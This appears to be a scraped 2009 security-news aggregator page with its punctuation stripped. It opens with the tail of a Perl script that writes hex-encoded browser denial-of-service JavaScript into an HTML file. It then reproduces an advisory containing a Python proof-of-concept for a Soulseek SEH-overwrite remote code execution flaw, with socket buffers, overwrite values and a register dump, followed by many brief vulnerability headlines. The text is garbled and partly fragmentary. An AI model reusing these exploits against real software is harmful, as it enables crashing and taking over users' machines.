##===*"x69x74x6Cx65x29x3Bx0D""x0Ax7Dx20x65x6C""x73x65x20x69x66x28x77""x69x6Ex64x6Fx77""x2Ex6Fx70x65x72x61x20";####################$L="x26x26x20x77x69x6Ex64x6Fx77x2E""x70x72x69x6Ex74x29x20x7B""x20x0Dx0Ax72x65x74""x75x72x6Ex20""x28x74x72""x75x65""x29""x3B""x20x7D""x7Dx0Dx0A""x76x61x72x20""x61x73x6Bx20x3Dx20""x63x6Fx6Ex66x69x72x6Dx28""x22x50x72x65x73x73x20x4Fx4Bx20""x74x6Fx20x73x74x61x72x74""x20x74x68x65x20x44""x6Fx53x2Ex5C""x6Ex50x72""x65x73""x73""x20""x4Ex6F""x20x74x6F""x20x64x6Fx64""x67x65x20x74x68x65""x20x44x6Fx53x2Ex22x29x3B""x0Dx0Ax69x66x20x28x61x73x6Bx20""x3Dx3Dx20x74x72x75x65x29""x20x7Bx20x0Dx0Ax66""x6Fx72x20x28""x78x3Dx30""x3Bx20""x78""x3C""x78x2B""x31x3Bx20""x78x2Bx2Bx29""x20x64x6Fx7Ax28x29""x3Bx0Dx0Ax7Dx20x65x6Cx73""x65x09x7Bx20x61x6Cx65x72x74x28""x22x4Fx6Bx20x3Ax28x22x29""x3Bx0Dx0Ax77x69x6E""x64x6Fx77x2E""x6Cx6Fx63""x61x74""x69""x6F""x6Ex2E""x68x72x65""x66x20x3Dx20""x22x68x74x74x70x3A""x2Fx2Fx77x77x77x2Ex71x74""x77x65x62x2Ex6Ex65x74x2Fx22x3B";#########$E="x0Dx0Ax7Dx20""x3Cx2Fx73x63""x72x69x70x74""x3Ex3Cx2Fx62""x6Fx64x79x3E""x3Cx2Fx68x65""x61x64x3Ex3C""x2Fx68x74x6D""x6Cx3E";#####____my $file = "Smilehtml";my $fun = $S$M$I$L$E;open mrowdiuqil, "/$file" || die "Mffff $";print mrowdiuqil "$fun";close mrowdiuqil;print "+ File $file created with funny potion";http://wwwzeroscienceorg/codes/qtweb_dostxtIMAGEhttp://www.secuobs.com/revue/news/104122.shtmlhttp://www.secuobs.com/revue/news/104122.shtml 2009-05-31 19:48:47 - Laurent Gaffié blog : Okay, what is this new bug It's a mass Soulseek P2P ownage PoC, made to prove a point:Unsafe and widely used P2P software can turn in something seriouslydangerous for everyone using a/this P2P networkGoing blind on a P2P network, assuming your payed_or_notanti-virussoftware will protect you, is just naiveIt's actually a perfect fast sprayed worm scenarioTheses kind of bug, will be more present, theses kinds of security bugare not really considered/watched, the security community doesn't lookfor that now, but some people does and a few disclose, this kind ofvector is under-estimated but present, and when the shit hits the faneveryone gets powned in a row=============================================- Release date: May 24th, 2009- Discovered by: Laurent Gaffié- Severity: critical=============================================I VULNERABILITY-------------------------Soulseek 157 NS * et 156* Remote Distributed Search Code ExecutionII BACKGROUND-------------------------"Soulseektm is a unique ad-free, spyware free, and just plain freefilesharing applicationOne of the things that makes Soulseektm unique is our community andcommunity-related featuresBased on peer-to-peer technology, virtual rooms allow you to meetpeople withthe same interests, share information, and chat freely using real-timemessagesin public or privateSoulseektm, with its built-in people matching system, is a great wayto makenew friends and expand your mind"III DESCRIPTION-------------------------Soulseek client allows distributed file search to one person,everyone, or in aspecific Soulseek IRC channel, allowing a user to find the files hewants, ina dedicated channel, or with his contacts, or on the whole networkUnfortunatly this feature is vulnerable to a remote SEH overwrite to aspecificuser, or even to a whole Soulseek IRC channelIV PROOF OF CONCEPT-------------------------This proof of concept is made to prevent a S-K party, it is only buildtotarget the user "testt4321"To try this proof of concept, you would have to open a soulseek clientand usethe username:"testt4321"with the password:"12345678"And launch this codeIf you want to change the username or target a whole channel, youwould haveto reverse the binary protocol#/usr/bin/pythonimport structimport sys, socketfrom time import *s = socketsocketsocketAF_INET, socketSOCK_STREAMsconnect"2087617050",2242 # Change to Port 2240 for 156*branchbuffer ="x48x00x00x00x01x00x00x00x08x00x00x00x74x65x73x74"buffer+="x34x33x32x31x08x00x00x00x31x32x33x34x35x36x37x38"buffer+="xb5x00x00x00x20x00x00x00x38x65x39x31x66x37x33x30"buffer+="x35x35x37x31x32x35x64x37x34x39x32x34x62x64x66x35"buffer+= "x63x32x39x61x36x37x64x61x01x00x00x00"ssendbuffersleep1junk = "x41" * 3084next_seh = structpack'seh = structpack'other_junk = "x61" * 1423buffer2 ="x01x0fx00x00x2ax00x00x00x09x00x00x00x74x65x73x74"buffer2+="x74x34x33x32x31xa4x5ax51x44xe8x0ex00x00"+junk+next_seh+seh+other_junkssendbuffer2sleep1srecv1024After the query is send, the memory will look like this0012FBE4 414141410012FBE8 42424242 Pointer to next SEH record0012FBEC 43434343 SE handler0012FBF0 61616161And the program will terminate with this structure:EAX 00000000ECX 43434343EDX 7C9132BC ntdll7C9132BCEBX 00000000ESP 0012EA78EBP 0012EA98ESI 00000000EDI 00000000EIP 43434343V BUSINESS IMPACT-------------------------An attacker could exploit this vulnerability to compromise anySoulseek client connected tothe Soulseek networkVI SYSTEMS AFFECTED-------------------------Windows all versionsVII SOLUTION-------------------------A fast solution would be to use Nicotine-Plushttp://nicotine-plussourceforgenet/a Python Soulseek clientAnother quick workaround at server level would be to limit thesearch query lenghtVIII REFERENCES-------------------------http://wwwslsknetorgIX CREDITS-------------------------This vulnerability has been discovered by Laurent GaffiéLaurentgaffie{remove-this}atgmailcomX REVISION HISTORY-------------------------May 24, 2009: Initial releaseXI DISCLOSURE TIMELINE-------------------------july 29, 2008: Bug discoveredSeptember 03, 2008: Vendor contacted; no responseOctober 14, 2008: Vendor contacted; still no responseApril 12, 2009: Idefense contactedApril 13, 2009: Idefense answeredApril 23, 2009: Advisory send to idefense contributor programMay 13, 2009: Idefense contacted, bug rejected no reason givenMay 15, 2009: Idefense recontacted; no answerMay 16, 2009: Last try to contact Soulseek maintainersMay 24, 2009: Advisory publishedXII LEGAL NOTICES-------------------------The information contained within this advisory is supplied "as-is"with no warranties or guarantees of fitness of use or otherwiseI accept no responsibility for any damage caused by the use ormisuse of this informationIMAGEhttp://www.secuobs.com/revue/news/104060.shtmlhttp://www.secuobs.com/revue/news/104060.shtml 2009-05-31 00:14:48 - Rootsecure.net : Torrent Freak: Soulseek P2P Application Vulnerable to Remote Takeoverhttp://www.secuobs.com/revue/news/103660.shtmlhttp://www.secuobs.com/revue/news/103660.shtml 2009-05-30 23:50:44 - Security for the Masses : TorrentFreak reports that SoulSeek, a popular music sharing program hasbeen vulnerable to a remote takeover for more than a year Thedevelopers were notified, but did not move to fix the flaw, so thediscoverer has released a llimited p0cRead more at TorrentFreakIMAGEhttp://www.secuobs.com/revue/news/103648.shtmlhttp://www.secuobs.com/revue/news/103648.shtml 2009-05-30 23:28:23 - TorrentFreak : Soulseek is one the greatest music sharing networks that most peoplehave never heard of, with a particular specialty in electronic musicUnfortunately, for nearly a year those using versions of the officialclient have been exposed to a highly critical vulnerability which canleave them open to remote takeoverSoulseek is one the greatest music sharing networks that most peoplehave never heard of, with a particular specialty in electronic musicUnfortunately, for nearly a year those using versions of the officialclient have been exposed to a highly critical vulnerability which canleave them open to remote takeoverhttp://www.secuobs.com/revue/news/103617.shtmlhttp://www.secuobs.com/revue/news/103617.shtml 2009-05-30 14:15:24 - Rootsecure.net : H Security: DSL router remotely controlled by URLhttp://www.secuobs.com/revue/news/103537.shtmlhttp://www.secuobs.com/revue/news/103537.shtml 2009-05-30 13:45:00 - milw0rm.com : http://www.secuobs.com/revue/news/103516.shtmlhttp://www.secuobs.com/revue/news/103516.shtml 2009-05-30 13:45:00 - milw0rm.com : http://www.secuobs.com/revue/news/103515.shtmlhttp://www.secuobs.com/revue/news/103515.shtml 2009-05-30 05:21:03 - milw0rm.com : http://www.secuobs.com/revue/news/103393.shtmlhttp://www.secuobs.com/revue/news/103393.shtml 2009-05-30 05:21:03 - milw0rm.com : http://www.secuobs.com/revue/news/103392.shtmlhttp://www.secuobs.com/revue/news/103392.shtml 2009-05-30 05:21:03 - milw0rm.com : http://www.secuobs.com/revue/news/103390.shtmlhttp://www.secuobs.com/revue/news/103390.shtml 2009-05-30 05:21:03 - milw0rm.com : http://www.secuobs.com/revue/news/103389.shtmlhttp://www.secuobs.com/revue/news/103389.shtml 2009-05-30 05:21:03 - milw0rm.com : http://www.secuobs.com/revue/news/103388.shtmlhttp://www.secuobs.com/revue/news/103388.shtml 2009-05-30 05:04:14 - ReverseConnection : SonicWALL SSL-VPN ‘cgi-bin/welcome/VirtualOffice’ Remote Format StringVulnerability Source: click herehttp://www.secuobs.com/revue/news/103361.shtmlhttp://www.secuobs.com/revue/news/103361.shtml 2009-05-30 05:04:14 - ReverseConnection : Linksys WAG54G2 Web Management Console Remote Arbitrary Shell CommandInjection Vulnerability Source: click herehttp://www.secuobs.com/revue/news/103357.shtmlhttp://www.secuobs.com/revue/news/103357.shtml 2009-05-29 23:33:30 - Threatpost Feed : From The H SecuritySecurity researcher Michal Sajdak revealed at CONFidence 2009 inKrakow in mid-May that it's relatively easy to make the LinksysWAG54G2 WLAN DSL router execute arbitrary shell commands He has nowpublished securitumpl further detailsSajdak discovered that it's easy to add a shell command to a POSTrequest and have the router execute it To test this, all you need isa proxy that can modify the POST request before it's sent Sajdak sayshe told the manufacturer, Cisco, about the error in March and hismessage was acknowledged, but he has received no report of a fix asyet Read the full story h-onlinecomhttp://www.secuobs.com/revue/news/103285.shtmlhttp://www.secuobs.com/revue/news/103285.shtml 2009-05-29 17:51:27 - ReverseConnection : Libpng Library Multiple Remote Denial of Service Vulnerabilities Source:click herehttp://www.secuobs.com/revue/news/103089.shtmlhttp://www.secuobs.com/revue/news/103089.shtml 2009-05-29 10:05:37 - Security for the Masses : Targeted exploits in the wildanyone hear whoM$ Security AdvisoryIMAGEhttp://www.secuobs.com/revue/news/103027.shtmlhttp://www.secuobs.com/revue/news/103027.shtml 2009-05-29 02:25:27 - ReverseConnection : CORE-2009-0401 - StoneTrip S3DPlayers remote command injection Source:click herehttp://www.secuobs.com/revue/news/102866.shtmlhttp://www.secuobs.com/revue/news/102866.shtml 2009-05-29 02:25:27 - ReverseConnection : Pinnacle Hollywood FX ‘hfz’ File Handling Remote Denial of ServiceVulnerability Source: click herehttp://www.secuobs.com/revue/news/102858.shtmlhttp://www.secuobs.com/revue/news/102858.shtml 2009-05-28 13:36:19 - Rootsecure.net : IT News AU: RIM warns of BlackBerry PDF vulnerability "Research In MotionRIM has released details of a flaw in its BlackBerry AttachmentService that could allow hackers to remotely execute code and gaincontrol of a BlackBerry Enterprise Server"http://www.secuobs.com/revue/news/102668.shtmlhttp://www.secuobs.com/revue/news/102668.shtml 2009-05-27 11:52:36 - The Academy Home : The average user does not require remote desktop support on their homecomputer Today’s video demonstrates how to disable this functionalityon a Windows XP system Don’t forget to sign-up for The Academy Proonline groups: Twitter YouTube Facebook If you’re already a memberplease don’t forget to tell your friends and family members toregister for a free account http://www.secuobs.com/revue/news/102144.shtmlhttp://www.secuobs.com/revue/news/102144.shtml 2009-05-27 11:49:20 - ReverseConnection : Multiple ATEN IP KVM Switches Multiple Remote Vulnerabilities andWeakness Source: click herehttp://www.secuobs.com/revue/news/102131.shtmlhttp://www.secuobs.com/revue/news/102131.shtml 2009-05-27 07:19:45 - terminal23 : I've long wondered when we'd see more P2P client attacks; I mean really,thousands of clients always-on and accepting traffic through thenetworkSeems my P2P network of choice, SoulSeek, has an exposed vulnerabilityin the client app since at least July 2008 Pretty nifty The softwareaccepts and processes queries for your shared files Seems this querylength isn't handled properlyJust think, I could continue to be using rootable software for yearsif not for some measure of full disclosure PahI like SoulSeek and have used it for about 6 years now as my primarymusic exposure tool, although I am open to new places since mysearches are not always as successful as they used to be What's more,there has not been a whole lot of movement from SoulSeek developers orthe community in quite some time, although the forums still have atrickling of activity It is not surprising that the exploit authorwas getting no response I've had the feeling in the past year thatthis is a bit of a headless beast anymoreOf note, the exploit author mentions using a Python-based SoulSeekclient This probably means there is plenty of documentation on whatSoulSeek does and how to interact with ithttp://www.secuobs.com/revue/news/102118.shtmlhttp://www.secuobs.com/revue/news/102118.shtml 2009-05-27 01:43:43 - milw0rm.com : http://www.secuobs.com/revue/news/101955.shtmlhttp://www.secuobs.com/revue/news/101955.shtml 2009-05-27 01:43:43 - milw0rm.com : http://www.secuobs.com/revue/news/101954.shtmlhttp://www.secuobs.com/revue/news/101954.shtml 2009-05-27 01:43:43 - milw0rm.com : http://www.secuobs.com/revue/news/101953.shtmlhttp://www.secuobs.com/revue/news/101953.shtml 2009-05-26 19:53:05 - milw0rm.com : http://www.secuobs.com/revue/news/101823.shtmlhttp://www.secuobs.com/revue/news/101823.shtml 2009-05-26 19:53:05 - milw0rm.com : http://www.secuobs.com/revue/news/101821.shtmlhttp://www.secuobs.com/revue/news/101821.shtml 2009-05-26 19:53:05 - milw0rm.com : http://www.secuobs.com/revue/news/101820.shtmlhttp://www.secuobs.com/revue/news/101820.shtml 2009-05-26 19:53:05 - milw0rm.com : http://www.secuobs.com/revue/news/101818.shtmlhttp://www.secuobs.com/revue/news/101818.shtml 2009-05-26 15:49:38 - milw0rm.com : http://www.secuobs.com/revue/news/101673.shtmlhttp://www.secuobs.com/revue/news/101673.shtml 2009-05-26 15:49:38 - milw0rm.com : http://www.secuobs.com/revue/news/101672.shtmlhttp://www.secuobs.com/revue/news/101672.shtml 2009-05-25 09:34:06 - RecognizeSecurity : Now this is a classy, few days ago Kingcope Nicolaos Rangos disclosed aremote authentication bypass vulnerability in Microsoft IIS 6 WebDAVservice In the advisory Kingcope details some of this vulnerabilityattack vectors, such as reading files within password protectedfolders and directory listing password protected WebDAV folders It isalso possible to upload http://www.secuobs.com/revue/news/101352.shtmlhttp://www.secuobs.com/revue/news/101352.shtml 2009-05-24 04:36:10 - SANS Internet Storm Center, InfoCON green : If you are concerned about the recent IIS 60 WebDav Remote Auth Bypassvulnerability, you will be i morehttp://www.secuobs.com/revue/news/101073.shtmlhttp://www.secuobs.com/revue/news/101073.shtml 2009-05-23 07:18:05 - Security Bloggers Network : Time MachinejpgDoes the Imperva SecureSphere Web Application FirewallWAF protect Imperva customers from this latest MicrosoftVulnerability 971492----------------------------------------------------------------------Yes In fact, protection against this type of attack has been builtinto the Imperva SecureSphere WAF for over three years; and it wasdone without a time machine Find out howOn this episode of the Imperva Security Podcast Amichai Shulman isinterviewed He talks about Microsoft Security Advisory Number 971492that was released on May 17th 2009 This vulnerability is related toMicrosoft IIS servers running WebDAV Amichai goes into detail aboutthe vulnerability, why servers are still vulnerable even though thisis a well known exploit, and how attacks can be mitigated with WAF orWeb Application Firewalls Amichai further talk about how the ImpervaSecureSphere WAF has been protecting customers from redundant UTF-8encoding attacks just like this for over three yearsListen to the Podcasthttp://www.secuobs.com/revue/news/100932.shtmlhttp://www.secuobs.com/revue/news/100932.shtml 2009-05-23 06:51:34 - milw0rm.com : http://www.secuobs.com/revue/news/100857.shtmlhttp://www.secuobs.com/revue/news/100857.shtml 2009-05-23 06:36:45 - ReverseConnection : Zeeways PHOTOVIDEOTUBE Multiple Remote Vulnerabilities Source: clickherehttp://www.secuobs.com/revue/news/100835.shtmlhttp://www.secuobs.com/revue/news/100835.shtml 2009-05-22 18:40:53 - ReverseConnection : Novell GroupWise Internet Agent Remote Buffer Overflow VulnerabilitiesSource: click herehttp://www.secuobs.com/revue/news/100530.shtmlhttp://www.secuobs.com/revue/news/100530.shtml 2009-05-21 19:42:58 - Crave The gadget blog : Go on, mingleCredit: CookingcomGrilling outdoors is great fun, and that fun is usually best sharedwith friends and family I don't just mean hanging out with them andenjoying their company; I mean putting them to work I have previouslynoted that engaging your guests is Originally posted at Appliances et Kitchen Gadgetshttp://www.secuobs.com/revue/news/100169.shtmlhttp://www.secuobs.com/revue/news/100169.shtml 2009-05-21 19:38:19 - milw0rm.com : http://www.secuobs.com/revue/news/100165.shtmlhttp://www.secuobs.com/revue/news/100165.shtml 2009-05-21 19:26:20 - ReverseConnection : PostgreSQL Conversion Encoding Remote Denial of Service VulnerabilitySource: click herehttp://www.secuobs.com/revue/news/100122.shtmlhttp://www.secuobs.com/revue/news/100122.shtml 2009-05-21 14:41:23 - Raymond.CC Blog : Recently one of my good friend asked me to help him set up aCounter-Strike Source dedicated server on his rented Windows 2008server I’ve previously done that on a Linux system before and I don’tthink it’d be a problem to do that on a Windows server since there aredocumentation to teach http://www.secuobs.com/revue/news/99926.shtmlhttp://www.secuobs.com/revue/news/99926.shtml 2009-05-21 00:27:18 - milw0rm.com : http://www.secuobs.com/revue/news/99699.shtmlhttp://www.secuobs.com/revue/news/99699.shtml 2009-05-20 19:50:27 - Alerts : Mal/Armada-A is a Trojan which may gather system information and send itto a remote attackerhttp://www.secuobs.com/revue/news/99604.shtmlhttp://www.secuobs.com/revue/news/99604.shtml 2009-05-20 05:24:29 - milw0rm.com : http://www.secuobs.com/revue/news/98625.shtmlhttp://www.secuobs.com/revue/news/98625.shtml